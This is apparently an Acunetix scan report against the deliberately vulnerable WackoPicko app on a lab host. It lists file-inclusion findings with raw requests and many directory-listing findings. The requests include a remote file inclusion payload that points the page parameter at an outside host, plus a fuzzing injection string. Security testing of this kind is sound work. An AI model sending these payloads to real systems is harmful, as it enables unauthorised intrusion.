Professional Documents
Culture Documents
09 June 2020
Generated by Acunetix
Scan of 192.168.1.124
Scan details
Scan information
Start time 09/06/2020, 04:08:40
Start url http://192.168.1.124/WackoPicko/
Host 192.168.1.124
Scan time 4 minutes, 52 seconds
Profile Full Scan
Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-
1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1
Server information mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14
OpenSSL/0.9.8k Phusion_Passenger/4.0.38
mod_perl/2.0.4 Perl/v5.10.1
Responsive True
Server OS Unix
Server technologies PHP,Perl,Python,Perl
Threat level
One or more high-severity type vulnerabilities have been discovered by the scanner. A malicious user can exploit these
vulnerabilities and compromise the backend database and/or deface your website.
Alerts distribution
File inclusion
Affected item /WackoPicko/admin/index.php
Affected parameter page
Request
POST /WackoPicko/admin/index.php?page=http://bxss.me/t/fit.txt%3F.jpg HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.1.124/WackoPicko/
Connection: keep-alive
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Content-Length: 41
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/73.0.3683.103 Safari/537.36
adminname=g00dPa%24%24w0rD&password=login
File inclusion
Affected item /WackoPicko/admin/index.php
Affected parameter page
Request
GET /WackoPicko/admin/index.php?page=http://bxss.me/t/fit.txt%3F.jpg HTTP/1.1
Referer: http://192.168.1.124/WackoPicko/
Connection: keep-alive
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/73.0.3683.103 Safari/537.36
💡
password=g00dPa%24%24w0rD&username=12345'"\'\");|]*%00{%0d%0a<
%00>%bf%27'
Directory listing
Affected item /WackoPicko/cart/
Affected parameter
Request
GET /WackoPicko/cart/ HTTP/1.1
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive
Directory listing
Affected item /WackoPicko/comments/
Affected parameter
Request
GET /WackoPicko/comments/ HTTP/1.1
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive
Directory listing
Affected item /WackoPicko/css/
Affected parameter
Request
GET /WackoPicko/css/ HTTP/1.1
Cookie: PHPSESSID=kc180u2rr3thbgefh30k8t06p4
Accept: */*
Accept-Encoding: gzip,deflate
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive
Directory listing
Affected item /WackoPicko/css/blueprint/
Affected parameter
Request
GET /WackoPicko/css/blueprint/ HTTP/1.1
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive
Directory listing
Affected item /WackoPicko/css/blueprint/src/
Affected parameter
Request
GET /WackoPicko/css/blueprint/src/ HTTP/1.1
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive
Directory listing
Affected item /WackoPicko/images/
Affected parameter
Request
GET /WackoPicko/images/ HTTP/1.1
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive
Directory listing
Affected item /WackoPicko/images/menu/
Affected parameter
Request
GET /WackoPicko/images/menu/ HTTP/1.1
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive
Directory listing
Affected item /WackoPicko/pictures/
Affected parameter
Request
GET /WackoPicko/pictures/ HTTP/1.1
Cookie: PHPSESSID=kc180u2rr3thbgefh30k8t06p4
Accept: */*
Accept-Encoding: gzip,deflate
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive
Directory listing
Affected item /WackoPicko/upload/
Affected parameter
Request
GET /WackoPicko/upload/ HTTP/1.1
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive
Directory listing
Affected item /WackoPicko/upload/3/
Affected parameter
Request
GET /WackoPicko/upload/3/ HTTP/1.1
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive
Directory listing
Affected item /WackoPicko/upload/LSiFMxMi/
Affected parameter
Request
GET /WackoPicko/upload/LSiFMxMi/ HTTP/1.1
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive
Directory listing
Affected item /WackoPicko/upload/doggie/
Affected parameter
Request
GET /WackoPicko/upload/doggie/ HTTP/1.1
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive
Directory listing
Affected item /WackoPicko/upload/flowers/
Affected parameter
Request
GET /WackoPicko/upload/flowers/ HTTP/1.1
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive
Directory listing
Affected item /WackoPicko/upload/foos/
Affected parameter
Request
GET /WackoPicko/upload/foos/ HTTP/1.1
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive
Directory listing
Affected item /WackoPicko/upload/house/
Affected parameter
Request
GET /WackoPicko/upload/house/ HTTP/1.1
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive
Directory listing
Affected item /WackoPicko/upload/quarters/
Affected parameter
Request
GET /WackoPicko/upload/quarters/ HTTP/1.1
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive
Directory listing
Affected item /WackoPicko/upload/testing/
Affected parameter
Request
GET /WackoPicko/upload/testing/ HTTP/1.1
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive
Directory listing
Affected item /WackoPicko/upload/toga/
Affected parameter
Request
GET /WackoPicko/upload/toga/ HTTP/1.1
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive
Directory listing
Affected item /WackoPicko/upload/twister/
Affected parameter
Request
GET /WackoPicko/upload/twister/ HTTP/1.1
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive
Directory listing
Affected item /WackoPicko/upload/waterfall/
Affected parameter
Request
GET /WackoPicko/upload/waterfall/ HTTP/1.1
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive
Directory listing
Affected item /WackoPicko/users/
Affected parameter
Request
GET /WackoPicko/users/ HTTP/1.1
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive